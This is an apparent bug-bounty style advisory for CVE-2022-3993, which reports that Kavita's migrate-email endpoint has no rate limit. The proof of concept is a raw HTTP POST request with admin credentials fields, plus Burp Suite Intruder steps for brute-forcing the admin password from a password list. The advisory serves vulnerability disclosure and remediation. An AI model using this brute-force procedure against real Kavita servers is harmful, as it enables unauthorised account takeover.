Headline
CVE-2022-3993: No Rate Limit On migrate-email Endpoint Leads to Brute-force Attack in kavita
Authentication Bypass by Primary Weakness in GitHub repository kareadita/kavita prior to 0.6.0.3.
The migrate-email endpoint is requiring Email, Username, and Password parameter. This endpoint contain authentication functionality that doesn’t have any protection from brute-force attack, which allows an attacker to try every possible password combination without any restriction.
CWE-307: Improper Restriction of Excessive Authentication Attempts****POC****1. Send this request to Burpsuite Intruder
POST /api/account/migrate-email HTTP/1.1
Host: 192.168.189.132:5000
Accept: application/json, text/plain, */*
DNT: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Referer: http://192.168.189.132:5000/admin/dashboard
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,id-ID;q=0.8,id;q=0.7,ar-SA;q=0.6,ar;q=0.5
Connection: close
Content-Type: application/json
Content-Length: 67
{"Email":"[email protected]",
"Username":"admin",
"Password":"xxx"
}
2. Mark on the Password value
3. Bruteforce attack with 1000 password list and get valid admin password
Impact
An attacker could perform a brute-force attack targeting normal and administrative users, using different passwords and eventually gain access to the targeted account, without any restriction.